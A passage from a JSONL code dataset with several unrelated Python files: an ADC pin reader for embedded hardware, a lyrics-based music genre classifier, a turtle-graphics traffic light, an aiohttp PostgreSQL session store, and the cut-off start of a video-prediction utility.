self.validate_pin(pin)\r\n \r\n # Test for any configuration error\r\n if scan_idx is -1 or mraa_idx is -1:\r\n raise ValueError(\"Init Error: pin scan list is incorrect!\")\r\n \r\n x = mraa.Aio(mraa_idx) # Create the mraa object for the pin \r\n self._pin_objects.append(x) # Append the mraa object to the list\r\n \r\n if self.SCAN_PINS_MUX[scan_idx] is not None:\r\n # If we have a MUX configuration for this pin, add it to the MUX list\r\n self._mux_object.add_mux_slot('ADC', pin, self.SCAN_PINS_MUX[scan_idx][:3], self.SCAN_PINS_MUX[scan_idx][-1])\r\n \r\n # Create a corresponding output dictionary and add it to the all_devices list\r\n self.all_devices.append({'chn':pin, 'val':0, 'cnt':0, 'actv':False, 'sublist':[]})\r\n \r\n \r\n def validate_pin(self, pin):\r\n \"\"\" Returns scan_idx, mraa_idx if succesful, -1, -1 if not. \r\n The scan_idx is the pin index in the class scan list.\r\n The mraa_idx is the pin number used by the mraa library. \"\"\"\r\n idx = None\r\n try: # Parse the input parameter\r\n if isinstance(pin, str):\r\n idx = str2idx[pin] # Pin is in string format -> use dict\r\n except KeyError: # Key error means it's not in str2idx dict.\r\n return -1, -1\r\n \r\n if not idx and isinstance(pin, int):\r\n idx = pin # If pin is already a number, save it\r\n \r\n if idx is None: # If we don't have a index by now -> error\r\n return -1, -1\r\n \r\n try:\r\n mraa_idx = idx2mraa[idx] # Convert index to mraa index\r\n except KeyError: # Key error -> pin is not mraa ADC pin \r\n return -1, -1\r\n \r\n try: # Get the scan index from the class scan list\r\n scan_idx = self.SCAN_PINS.index(idx) \r\n except ValueError: # Value Error -> pin not in class scan list\r\n return -1, mraa_idx\r\n \r\n return scan_idx, mraa_idx\r\n \r\n def get_mv(self, pin):\r\n \"\"\" Gets the Voltage value reading of the specified ADC channel pin.\r\n Only works on the class list of initialized pins. \"\"\"\r\n # Validate the input pin channel. Also get the index info\r\n scan_idx, mraa_idx = self.validate_pin(pin)\r\n \r\n if mraa_idx is -1: # Given pin is not a mraa ADC pin\r\n raise ValueError(\"Parameter error: pin should either be a number 0-6 or a string(e.g. 
P9_39)\")\r\n if scan_idx is -1: # Given pin is a mraa ADC pin, but is not in the list\r\n raise ValueError(\"Parameter error: pin is correct but is not on the list of initialized pins\")\r\n \r\n # Since 1.8V is maximum, rescale the float reading accordingly\r\n return 1.8 * self._pin_objects[scan_idx].readFloat()\r\n \r\n def get_all_mv(self):\r\n \"\"\" Gets the Voltage value reading of all the configured ADC channel pins.\r\n Returns a list of voltage values corresponding to the scan list.\r\n If any mux is connected, a list will be returned instead of a value in\r\n the corresponding channel slot (e.g. [1, 2, [3, 3, 3, ... 3]])\"\"\"\r\n ret = [] # Init return object to an epty list\r\n for pin in self.SCAN_PINS: # Go through all pins in the ADC scan list\r\n # Append the MUXed values to the return object. This is either one\r\n # value (no MUX connected), or a list of values (MUX connected)\r\n ret.append(self._mux_object.get_muxed_values(pin, self.get_mv, pin))\r\n return ret # Return the return object\r\n \r\n def _update_channel(self, chn, val):\r\n \"\"\" Updates a specific channel with a milivolt value. If the milivolt value is a list,\r\n as would be the case for a MUX, the subchannels are updated accordingly.\r\n Returns a message list of the type: {'chn', 'subchn', 'event':'disc'/'conn'/'none', 'mux':'disc'/'conn'/'none'}\"\"\"\r\n # Get the channel index corresponding to the current channel element\r\n chn_idx = next((index for (index, d) in enumerate(self.all_devices) if d[\"chn\"] == chn))\r\n c_dict = self.all_devices[chn_idx] # Select the current element dictionary\r\n ret_list = [] # Initialize the return object to an empty list\r\n \r\n if isinstance(val, list): # Check if we are dealing with a MUXed value or not\r\n c_dict['val'] = -1 # Since val is a list -> we will use the 'sublist'\r\n c_dict['actv'] = False # Reset the 'actv' value\r\n mux_con_flag = False # Goes 'True' if this is the iteration which detected the MUX\r\n for val_idx, val_mv in enumerate(val):\r\n try: # Try and get the dictionary of the MUXed value index\r\n sbchn_idx = next((index for (index, d) in enumerate(c_dict['sublist']) if d[\"subchn\"] == val_idx))\r\n sbchn_dict = c_dict['sublist'][sbchn_idx] # Get the subchannel dictionanry\r\n sbchn_dict['val'] = val_mv # Set the subchannel voltage value to the measured one\r\n if val_mv <= 0.005 and sbchn_dict['cnt'] > 0:\r\n sbchn_dict['cnt'] -= 1 # Decrease counter value if new voltage is almost 0\r\n if sbchn_dict['cnt'] == 0 and sbchn_dict['actv']:\r\n sbchn_dict['actv'] = False # Disable channel if the counter reached 0\r\n # Add disconnected event to return list\r\n ret_list.append({'chn':chn, 'subchn':sbchn_idx, 'event':'disc', 'mux':'none'})\r\n elif val_mv >= 0.005 and sbchn_dict['cnt'] < self.timeout_ticks:\r\n sbchn_dict['cnt'] += 1 # Increment counter value if new voltage is not 0\r\n if sbchn_dict['cnt'] == self.timeout_ticks and sbchn_dict['actv'] == False:\r\n sbchn_dict['actv'] = True # Enable channel if the counter reached the threshold\r\n # Add connected event to return list\r\n ret_list.append({'chn':chn, 'subchn':sbchn_idx, 'event':'conn', 'mux':'none'})\r\n if sbchn_dict['actv'] == True: # For any active subchannel, the channel is active\r\n c_dict['actv'] = True\r\n except: # We don't have a dictionary for the MUXed value yet -> add a default one\r\n c_dict['sublist'].append({'chn':chn, 'subchn':val_idx, 'val':val_mv, 'cnt':1, 'actv':False})\r\n mux_con_flag = True # Mux connected event detected!\r\n if mux_con_flag: # Return 
MUX connected event. Used flag to avoid multiple instances of same event\r\n ret_list.append({'chn':chn, 'subchn':-1, 'event':'none', 'mux':'conn'})\r\n else: # We are NOT dealing with a MUXed value -> No mux connected\r\n if len(c_dict['sublist']) > 0: # Return MUX disconnected event\r\n ret_list.append({'chn':chn, 'subchn':-1, 'event':'none', 'mux':'disc'})\r\n c_dict['sublist'] = [] # Since no MUX connected -> we have no sublist\r\n c_dict['val'] = val # Since val is a value -> update it\r\n \r\n if val <= 0.005 and c_dict['cnt'] > 0: # Reading of 0 on an existing channel with cnt > 0\r\n c_dict['cnt'] -= 1 # Decrease counter value\r\n if c_dict['cnt'] == 0 and c_dict['actv']:\r\n c_dict['actv'] = False # Disable channel if the counter reached 0\r\n ret_list.append({'chn':chn, 'subchn':-1, 'event':'disc', 'mux':'none'})\r\n elif val >= 0.005 and c_dict['cnt'] < self.timeout_ticks:\r\n c_dict['cnt'] += 1 # Increment counter value\r\n if c_dict['cnt'] == self.timeout_ticks and c_dict['actv'] == False:\r\n c_dict['actv'] = True # Enable channel if the counter reached the threshold\r\n ret_list.append({'chn':chn, 'subchn':-1, 'event':'conn', 'mux':'none'})\r\n return ret_list\r\n \r\n \r\n def update_devices(self):\r\n \"\"\" Updates the connected devices dictionary list. Returns a new list of \r\n dictionaries on the form of {'chn', 'subchn', 'event':'disc'/'conn'/'none', 'mux':'disc'/'conn'/'none'}\"\"\"\r\n ret_list = [] # Init the return object to an empty list\r\n milivolts = self.get_all_mv() # Get all voltage levels (MUX values included) \r\n for scan_idx, mv_val in enumerate(milivolts): # Go through all scan channels and update them\r\n chn = self.SCAN_PINS[scan_idx] # Get the pin channel from the scan index\r\n new_elems = self._update_channel(chn, mv_val)\r\n ret_list += new_elems # Update the return list\r\n \r\n self.connected_devices = [] # Update connected devices - start by clearing previous results\r\n for elem in self.all_devices: # Go through all channels dictionary list \r\n if elem['actv']: # Only care about active channels\r\n if len(elem['sublist']) > 0: # Check if channel has a connected MUX\r\n for sub_elem in elem['sublist']:\r\n if sub_elem['actv']: # Create entries for all active subchannels\r\n self.connected_devices.append({'chn':sub_elem['chn'], 'subchn':sub_elem['subchn'], 'val':sub_elem['val'], 'cnt':sub_elem['cnt'], 'actv':True})\r\n else: # No MUX -> just create the entry\r\n self.connected_devices.append({'chn':elem['chn'], 'subchn':-1, 'val':elem['val'], 'cnt':elem['cnt'], 'actv':True})\r\n \r\n return ret_list\r\n \r\n \r\n \"\"\" List of scan pins to be initialized. SHOULD BE CONSTAT THROUGHT EXECUTION \"\"\"\r\n SCAN_PINS = [0, 1, 2]\r\n \r\n \"\"\" Set here the MUX pins for each scan pin. Mux pins are(in order): A, B, C, detect \"\"\"\r\n SCAN_PINS_MUX = [None, [\"P8_41\", \"P8_42\", \"P8_43\", \"P8_44\"], None]\r\n \r\n \"\"\" The MUX object for the ADC. \"\"\"\r\n _mux_object = None\r\n \r\n \"\"\" List of all initialized pin objects. Created from the list of scan pins. \"\"\"\r\n _pin_objects = []\r\n \r\n \"\"\" List of connected devices dictionary. Contains: {chn, subchn, val, cnt, actv}.\r\n Subchannel is -1 in case no MUX is connected. \"\"\"\r\n connected_devices = []\r\n \r\n \"\"\" List of all devices dictionary. Contains: {chn, val, cnt, actv, sublist}. Val is -1 for MUXed channels.\r\n Sublist is a list of dictionaries for all MUXed values: {subchn, val, cnt, actv}\"\"\"\r\n all_devices = []\r\n \r\n \"\"\" Number of ticks for a timeout. 
If the output is 0 for more ticks than \r\n this value, the device is considered disconnected. \"\"\"\r\n timeout_ticks = 5\r\n","sub_path":"SoftWEAR/Python/RoboADC.py","file_name":"RoboADC.py","file_ext":"py","file_size_in_byte":12383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"552452564","text":"import pandas as pd\r\nimport numpy as np\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\n\r\n# nltk.download('stopwords')\r\n\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.model_selection import KFold\r\n\r\nimport pickle\r\n\r\nfrom unicodedata import normalize\r\n\r\ndf_bossa = pd.read_csv('./data/bossa_nova.csv')\r\n\r\ndf_funk = pd.read_csv('./data/funk.csv')\r\n\r\ndf_gospel = pd.read_csv('./data/gospel.csv')\r\n\r\ndf_sertanejo = pd.read_csv('./data/sertanejo.csv')\r\n\r\n# cria base de dados única\r\n\r\ndf_bossa['genre'] = 'bossa'\r\ndf_funk['genre'] = 'funk'\r\ndf_gospel['genre'] = 'gospel'\r\ndf_sertanejo['genre'] = 'sertanejo'\r\n\r\nframes = [df_bossa, df_funk, df_gospel, df_sertanejo]\r\n\r\nbase_dados = pd.concat(frames, ignore_index = True)\r\n\r\ndef preprocessamento(df):\r\n # converte letras para lowercase\r\n df['lyric'] = df['lyric'].apply(lambda x: x.lower())\r\n\r\n # remove pontuação\r\n df['lyric'] = df['lyric'].str.replace(r'[^\\w\\s]', '')\r\n \r\n # remove acentos\r\n df['lyric'] = df['lyric'].apply(lambda x: normalize('NFKD', x).encode('ASCII', 'ignore').decode('ASCII'))\r\n\r\n # remove \\n|\\r|\\n\\r\r\n df['lyric'] = df['lyric'].str.replace(r'\\n|\\r|\\n\\r', ' ')\r\n\r\n # remove stopwords\r\n stop = set(stopwords.words('portuguese'))\r\n df['lyric'] = df['lyric'].apply(lambda x: ' '.join([word for word in x.split() if word not in (stop)]))\r\n \r\n # convertendo label 'genre' para números\r\n le = LabelEncoder()\r\n df['genre'] = le.fit(df['genre']).transform(df['genre'])\r\n \r\n return df\r\n\r\ndf = preprocessamento(base_dados)\r\n\r\n# normalizacao \r\ntfidf_vec = TfidfVectorizer()\r\ntfidf_vec.set_params(stop_words=None, max_features=30000, min_df=4, ngram_range=(1, 2))\r\ntfidf = tfidf_vec.fit(df.lyric)\r\nX = tfidf_vec.transform(df.lyric)\r\n\r\npickle.dump(tfidf, open(\"tfidf_vec.pickle\", \"wb\"))\r\n\r\nscale = MinMaxScaler()\r\nX = scale.fit_transform(X.toarray())\r\n\r\nX = pd.DataFrame(X)\r\ny = df.genre\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(X, y, test_size = .1, random_state=200)\r\n\r\nresultados = []\r\n\r\nlr = LogisticRegression()\r\nfit = lr.fit(x_train, y_train)\r\npred = fit.predict(x_test)\r\naccuracy = accuracy_score(y_test, pred)\r\n\r\nresultados.append({ \"Classificador\" : \"Logistic Regression\", \r\n \"Acurácia\" : \"%.4f\" % accuracy, \r\n })\r\n\r\nnb = MultinomialNB()\r\nfit = nb.fit(x_train, y_train)\r\npred = fit.predict(x_test)\r\naccuracy = accuracy_score(y_test, pred)\r\n\r\nresultados.append({ \"Classificador\" : \"Naive Bayes\", \r\n \"Acurácia\" : \"%.4f\" % accuracy, \r\n })\r\n\r\nsgdc = SGDClassifier(loss='hinge', penalty='l2',\r\n alpha=1e-3, random_state=42)\r\nfit = sgdc.fit(x_train, y_train)\r\npred = fit.predict(x_test)\r\naccuracy = accuracy_score(y_test, pred)\r\n\r\nresultados.append({ \"Classificador\" : \"SGDC\", \r\n \"Acurácia\" : \"%.4f\" % accuracy, \r\n })\r\n\r\ndecision = MLPClassifier(alpha=1)\r\nfit = decision.fit(x_train, y_train)\r\npred = fit.predict(x_test)\r\naccuracy = accuracy_score(y_test, 
pred)\r\n\r\nresultados.append({ \"Classifier\" : \"Neural Network\", \r\n \"Accuracy\" : \"%.4f\" % accuracy, \r\n })\r\n\r\nX = X.loc[:,:].values\r\ny = y.loc[:].values\r\n\r\nkf = KFold(n_splits=10)\r\n\r\nclassificadores = [LogisticRegression(),\r\n MultinomialNB(),\r\n SGDClassifier(loss='hinge', penalty='l2', alpha=1e-3, random_state=42),\r\n MLPClassifier(alpha=1),\r\n ]\r\n\r\nidentificacao = [\r\n 'Logistic Regression',\r\n 'Naive Bayes', \r\n 'SGDC', \r\n 'Neural Network',\r\n ]\r\n\r\nacuracia = {}\r\n\r\nfor i in identificacao:\r\n acuracia[i] = []\r\n \r\nfor train, test in kf.split(X):\r\n X_train, X_test, y_train, y_test = X[train], X[test], y[train], y[test]\r\n \r\n for ident, clas in zip(identificacao, classificadores):\r\n fit = clas.fit(X_train, y_train)\r\n pred = fit.predict(X_test)\r\n acuracia[ident].append(accuracy_score(y_test, pred))\r\n\r\nresultados2 = []\r\n\r\nfor i in identificacao:\r\n resultados2.append({ \"Classifier\" : i, \r\n \"Accuracy (Kfold)\" : \"%.4f ± %.4f \" % (np.mean(acuracia[i]), np.std(acuracia[i])), \r\n })\r\n\r\npd.DataFrame(resultados)\r\n\r\npd.DataFrame(resultados2)\r\n","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"119190757","text":"import turtle\r\nimport sys\r\n\r\n#turtle.setup(400,500)\r\nwn= turtle.Screen()\r\nwn.setup(400,500)\r\nwn.title(\"Tess becomes a traffic light!\")\r\nwn.bgcolor(\"lightgreen\")\r\ntess= turtle.Turtle()\r\n\r\ndef draw_housing():\r\n \"\"\" Draw a nice housing to hold the traffic lights \"\"\"\r\n tess.pensize(3)\r\n tess.color(\"black\", \"darkgrey\")\r\n tess.begin_fill()\r\n tess.forward(80)\r\n tess.left(90)\r\n tess.forward(200)\r\n tess.circle(40,180)\r\n tess.forward(200)\r\n tess.left(90)\r\n tess.end_fill()\r\n\r\n\r\ndraw_housing()\r\ntess.penup()\r\n\r\ntess.forward(40)\r\ntess.left(90)\r\ntess.forward(50)\r\n\r\ntess.shape(\"circle\")\r\ntess.shapesize(3)\r\ntess.fillcolor(\"green\")\r\n\r\nstate_num = 0\r\n\r\n\r\ndef advance_state_machine():\r\n global state_num\r\n if state_num == 0:\r\n tess.forward(70)\r\n tess.fillcolor(\"orange\")\r\n state_num=1\r\n elif state_num == 1:\r\n tess.forward(70)\r\n tess.fillcolor(\"red\")\r\n state_num=2\r\n else:\r\n tess.back(140)\r\n tess.fillcolor(\"green\")\r\n state_num =0\r\n\r\n\r\n\r\nlargura= tess.pensize()\r\ndef increase():\r\n global largura\r\n if largura < 20 :\r\n largura = largura + 1\r\n tess.width(largura)\r\n\r\ndef decrease():\r\n global largura\r\n if largura > 1:\r\n largura = largura -1\r\n tess.width(largura)\r\n\r\n\r\ncode_color= 0\r\ndef background():\r\n global code_color\r\n if code_color == 0:\r\n wn.bgcolor(\"lightgreen\")\r\n code_color =1\r\n elif code_color== 1:\r\n wn.bgcolor(\"grey\")\r\n code_color =2\r\n else:\r\n wn.bgcolor(\"purple\")\r\n code_color=0\r\n\r\n\r\ndef blue():\r\n \"Atributtes color blue\"\r\n tess.fillcolor(\"blue\")\r\n\r\ndef green():\r\n \"Atributtes color green\"\r\n tess.fillcolor(\"green\")\r\n\r\ndef red():\r\n \"Atributtes color red\"\r\n tess.fillcolor(\"red\")\r\n\r\n\r\n\r\nwn.onkey(advance_state_machine, \"space\")\r\n#MODIFICADO POR MIM\r\nwn.onkey(increase,\"+\")\r\nwn.onkey(decrease,\"-\")\r\nwn.onkey(background,\"c\")\r\nwn.onkey(blue,\"b\")\r\nwn.onkey(green,\"g\")\r\nwn.onkey(red,\"r\")\r\n#FIM DA MODIFICAÇÃO\r\nwn.listen()\r\nwn.mainloop()","sub_path":"lista2/questao1.py","file_name":"questao1.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"538484187","text":"try:\n import asyncpg\nexcept ImportError: # pragma: no cover\n asyncpg = None\ntry:\n import aiopg\nexcept ImportError: # pragma: no cover\n aiopg = None\n\nimport re\nimport json\nimport uuid\nimport asyncio\nfrom datetime import datetime, timedelta\nfrom . import AbstractStorage, Session\n\n\nRE_PG_IDENTIFIERS = re.compile('[^\\W\\d][\\w$]{0,62}')\nRE_QUERY_PARAMS = re.compile(' \\$\\d ')\n\n\nclass PostgresqlAbstractStorage(AbstractStorage):\n \"\"\"Postgresql abstract storage\"\"\"\n\n def __init__(self, driver_pool, *, cookie_name=\"AIOHTTP_SESSION\",\n domain=None, max_age=None, path='/',\n secure=None, httponly=True,\n key_factory=lambda: uuid.uuid4().hex,\n encoder=json.dumps, decoder=json.loads,\n schema_name='public', table_name='aiohttp_session',\n column_name_key='key', column_name_data='data',\n column_name_expire='expire', data_type='text',\n timeout=None):\n super().__init__(cookie_name=cookie_name, domain=domain,\n max_age=max_age, path=path, secure=secure,\n httponly=httponly,\n encoder=encoder, decoder=decoder)\n self._key_factory = key_factory\n self._driver_pool = driver_pool\n self._timeout = timeout\n self._task_delete_exired = None\n\n self._schema_name = str(schema_name)\n if not RE_PG_IDENTIFIERS.fullmatch(self._schema_name):\n raise ValueError('Schema name \"{}\" is invalid Postgresql name'\n .format(schema_name))\n self._table_name = str(table_name)\n if not RE_PG_IDENTIFIERS.fullmatch(self._table_name):\n raise ValueError('Table name \"{}\" is invalid Postgresql name'\n .format(table_name))\n self._column_name_key = str(column_name_key)\n if not RE_PG_IDENTIFIERS.fullmatch(self._column_name_key):\n raise ValueError('Column name \"{}\" is invalid Postgresql name'\n .format(column_name_key))\n self._column_name_data = str(column_name_data)\n if not RE_PG_IDENTIFIERS.fullmatch(self._column_name_data):\n raise ValueError('Column name \"{}\" is invalid Postgresql name'\n .format(column_name_data))\n self._column_name_expire = str(column_name_expire)\n if not RE_PG_IDENTIFIERS.fullmatch(self._column_name_expire):\n raise ValueError('Column name \"{}\" is invalid Postgresql name'\n .format(column_name_expire))\n self._data_type = str(data_type).lower()\n if self._data_type not in ('jsonb', 'text'):\n raise ValueError('Data type must be one of values: '\n '\"text\", \"jsonb\", got {}'\n .format(data_type))\n self._prepare_queries()\n\n def _prepare_queries(self):\n self._query_setup_table_if_not_exists = '''\n CREATE TABLE IF NOT EXISTS {schema_name}.{table_name} (\n {key} varchar(128) PRIMARY KEY NOT NULL,\n {data} {data_type} DEFAULT '{{}}' NOT NULL,\n {expire} timestamp without time zone\n );\n CREATE INDEX IF NOT EXISTS {table_name}_{expire}\n ON {table_name} ({expire});\n '''.format(\n schema_name=self._schema_name,\n table_name=self._table_name,\n key=self._column_name_key,\n data=self._column_name_data,\n data_type=self._data_type.upper(),\n expire=self._column_name_expire,\n )\n self._query_delete_expired_sessions = '''\n DELETE FROM {schema_name}.{table_name} WHERE {expire} <= $1 ;\n '''.format(\n schema_name=self._schema_name,\n table_name=self._table_name,\n expire=self._column_name_expire,\n )\n self._query_load_session = '''\n SELECT {data} FROM {schema_name}.{table_name} WHERE\n {key} = $1 AND\n ({expire} > $2 OR {expire} IS NULL);\n '''.format(\n schema_name=self._schema_name,\n table_name=self._table_name,\n key=self._column_name_key,\n data=self._column_name_data,\n expire=self._column_name_expire,\n )\n 
self._query_save_session = '''\n INSERT INTO {schema_name}.{table_name}({key}, {data}, {expire})\n VALUES ( $1 , $2 , $3 )\n ON CONFLICT ({key}) DO UPDATE SET\n {data}=EXCLUDED.{data},\n {expire}=EXCLUDED.{expire};\n '''.format(\n schema_name=self._schema_name,\n table_name=self._table_name,\n key=self._column_name_key,\n data=self._column_name_data,\n expire=self._column_name_expire,\n )\n\n async def _execute_query(self, query, *params):\n raise NotImplementedError('Storage for specific driver '\n 'must implement this method')\n\n async def _delete_expired_sessions(self):\n await self._execute_query(self._query_delete_expired_sessions,\n *(datetime.utcnow(),))\n await asyncio.sleep(self._delete_expired_every)\n self._task_delete_expired = asyncio.ensure_future(\n self._delete_expired_sessions())\n\n async def initialize(self, setup_table=True, delete_expired_every=3600):\n if setup_table:\n await self._execute_query(self._query_setup_table_if_not_exists)\n if delete_expired_every:\n self._delete_expired_every = delete_expired_every\n self._task_delete_expired = asyncio.ensure_future(\n self._delete_expired_sessions())\n\n def finalize(self):\n if hasattr(self, '_task_delete_expired'):\n self._task_delete_expired.cancel()\n\n async def load_session(self, request):\n cookie = self.load_cookie(request)\n if cookie is None:\n return Session(None, data=None, new=True, max_age=self.max_age)\n else:\n key = str(cookie)\n result = await self._execute_query(self._query_load_session,\n *(key, datetime.utcnow()),\n fetchrow=True)\n if result is None:\n return Session(None, data=None, new=True, max_age=self.max_age)\n else:\n data = result[0]\n try:\n data = self._decoder(data)\n except ValueError:\n data = None\n return Session(key, data=data, new=False, max_age=self.max_age)\n\n async def save_session(self, request, response, session):\n key = session.identity\n if key is None:\n key = self._key_factory()\n self.save_cookie(response, key,\n max_age=session.max_age)\n else:\n if session.empty:\n self.save_cookie(response, '',\n max_age=session.max_age)\n else:\n key = str(key)\n self.save_cookie(response, key,\n max_age=session.max_age)\n\n data = self._encoder(self._get_session_data(session))\n expire = datetime.utcnow() + timedelta(seconds=session.max_age) \\\n if session.max_age is not None else None\n await self._execute_query(self._query_save_session,\n *(key, data, expire))\n\n\nclass PostgresqlAsyncpgStorage(PostgresqlAbstractStorage):\n \"\"\"Postgresql asyncpg storage\"\"\"\n\n def __init__(self, asyncpg_pool, *args, **kwargs):\n super().__init__(asyncpg_pool, *args, **kwargs)\n if asyncpg is None:\n raise RuntimeError(\"Please install asyncpg\")\n if not isinstance(asyncpg_pool, asyncpg.pool.Pool):\n raise TypeError(\"Expected asyncpg.pool.Pool got {}\".format(\n type(asyncpg_pool)))\n if self._data_type == 'jsonb':\n self._encoder = lambda x: x\n self._decoder = lambda x: x\n\n async def _execute_query(self, query, *params, fetchrow=False):\n async with self._driver_pool.acquire() as conn:\n if fetchrow:\n record = await conn.fetchrow(query, *params,\n timeout=self._timeout)\n return tuple(record.values()) if record else None\n else:\n await conn.execute(query, *params, timeout=self._timeout)\n\n\nclass PostgresqlAiopgStorage(PostgresqlAbstractStorage):\n \"\"\"Postgresql aiopg storage\"\"\"\n\n def __init__(self, aiopg_pool, *args, **kwargs):\n super().__init__(aiopg_pool, *args, **kwargs)\n if aiopg is None:\n raise RuntimeError(\"Please install aiopg\")\n if not isinstance(aiopg_pool, 
aiopg.pool.Pool):\n raise TypeError(\"Expected aiopg.pool.Pool, got {}\".format(\n type(aiopg_pool)))\n if self._data_type == 'jsonb':\n from psycopg2.extras import Json\n self._encoder = Json\n self._decoder = lambda x: x\n\n def _prepare_queries(self):\n super()._prepare_queries()\n self._query_delete_expired_sessions = \\\n RE_QUERY_PARAMS.sub(' %s ', self._query_delete_expired_sessions)\n self._query_load_session = \\\n RE_QUERY_PARAMS.sub(' %s ', self._query_load_session)\n self._query_save_session = \\\n RE_QUERY_PARAMS.sub(' %s ', self._query_save_session)\n\n async def _execute_query(self, query, *params, fetchrow=False):\n async with self._driver_pool.acquire() as conn:\n async with conn.cursor() as cur:\n await cur.execute(query, parameters=params,\n timeout=self._timeout)\n if fetchrow:\n return await cur.fetchone()\n","sub_path":"aiohttp_session/postgresql_storage.py","file_name":"postgresql_storage.py","file_ext":"py","file_size_in_byte":10206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
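A minimal wiring sketch for the asyncpg-backed storage above. The DSN, route, and handler are illustrative assumptions; `setup` and `get_session` are aiohttp_session's standard helpers, and the import path follows this record's `sub_path`.

# Hypothetical usage sketch, not part of the stored module itself.
import asyncpg
from aiohttp import web
from aiohttp_session import setup, get_session
from aiohttp_session.postgresql_storage import PostgresqlAsyncpgStorage

async def make_app():
    # assumed DSN; replace with real credentials
    pool = await asyncpg.create_pool(dsn='postgresql://user:secret@localhost/appdb')
    storage = PostgresqlAsyncpgStorage(pool)
    await storage.initialize()  # creates the sessions table, starts the expiry task

    async def visits(request):
        session = await get_session(request)
        session['visits'] = session.get('visits', 0) + 1
        return web.Response(text='visits: %d' % session['visits'])

    app = web.Application()
    setup(app, storage)
    app.router.add_get('/', visits)
    return app

if __name__ == '__main__':
    web.run_app(make_app())  # run_app accepts a coroutine returning an Application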
+{"seq_id":"640830431","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport csv\nimport errno\nimport json\nimport os\nimport random\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.util import nest\n\nimport os, sys, inspect\n# sys.path.insert(0, '/home/angelina/deeprl_project/video_prediction-1/')\n\nfrom video_prediction import datasets, models, metrics\nfrom video_prediction.policies.servo_policy import ServoPolicy\nimport imageio\n\n\ndef compute_expectation_np(pix_distrib):\n assert pix_distrib.shape[-1] == 1\n pix_distrib = pix_distrib / np.sum(pix_distrib, axis=(-3, -2), keepdims=True)\n height, width = pix_distrib.shape[-3:-1]\n xv, yv = np.meshgrid(np.arange(width), np.arange(height))\n return np.stack([np.sum(yv[:, :, None] * pix_distrib, axis=(-3, -2, -1)),\n np.sum(xv[:, :, None] * pix_distrib, axis=(-3, -2, -1))], axis=-1)\n\n\ndef as_heatmap(image, normalize=True):\n import matplotlib.pyplot as plt\n image = np.squeeze(image, axis=-1)\n if normalize:\n image = image / np.max(image, axis=(-2, -1), keepdims=True)\n cmap = plt.get_cmap('viridis')\n heatmap = cmap(image)[..., :3]\n return heatmap\n\n\ndef rgb2gray(rgb):\n return np.dot(rgb[..., :3], [0.299, 0.587, 0.114])\n\n\ndef resize_and_draw_circle(image, size, center, radius, dpi=128.0, **kwargs):\n import matplotlib.pyplot as plt\n from matplotlib.patches import Circle\n import io\n height, width = size\n fig = plt.figure(figsize=(width / dpi, height / dpi), dpi=dpi)\n ax = fig.add_axes([0, 0, 1, 1])\n ax.imshow(image, interpolation='none')\n circle = Circle(center[::-1], radius=radius, **kwargs)\n ax.add_patch(circle)\n ax.axis(\"off\")\n fig.canvas.draw()\n trans = ax.figure.dpi_scale_trans.inverted()\n bbox = ax.bbox.transformed(trans)\n buff = io.BytesIO()\n plt.savefig(buff, format=\"png\", dpi=ax.figure.dpi, bbox_inches=bbox)\n buff.seek(0)\n image = plt.imread(buff)[..., :3]\n plt.close(fig)\n return image\n\n\ndef save_image_sequence(prefix_fname, images, overlaid_images=None, centers=None,\n radius=5, alpha=0.8, time_start_ind=0):\n import cv2\n import imageio\n head, tail = os.path.split(prefix_fname)\n if head and not os.path.exists(head):\n os.makedirs(head)\n if images.shape[-1] == 1:\n images = as_heatmap(images)\n if overlaid_images is not None:\n assert images.shape[-1] == 3\n assert overlaid_images.shape[-1] == 1\n gray_images = rgb2gray(images)\n overlaid_images = as_heatmap(overlaid_images)\n images = (1 - alpha) * gray_images[..., None] + alpha * overlaid_images\n gif_images = []\n for t, image in enumerate(images):\n image_fname = '%s_%02d.png' % (prefix_fname, time_start_ind + t)\n if centers is not None:\n scale = np.max(np.array([256, 256]) / np.array(image.shape[:2]))\n image = resize_and_draw_circle(image, np.array(image.shape[:2]) * scale, centers[t], radius,\n edgecolor='r', fill=False, linestyle='--', linewidth=2)\n image = (image * 255.0).astype(np.uint8)\n gif_images.append(image)\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) # imaes[:,:,::-1]\n #cv2.imwrite(image_fname, image)\n #print(\"GIF IMAGES SHAPE: {}\".format(np.array(gif_images).shape))\n return gif_images\n imageio.mimsave('{}.gif'.format(prefix_fname), gif_images)\n\n\ndef save_image_sequences(prefix_fname, images, overlaid_images=None, centers=None,\n radius=5, alpha=0.8, sample_start_ind=0, time_start_ind=0, ensemble=False):\n head, tail = os.path.split(prefix_fname)\n if head and not os.path.exists(head):\n 
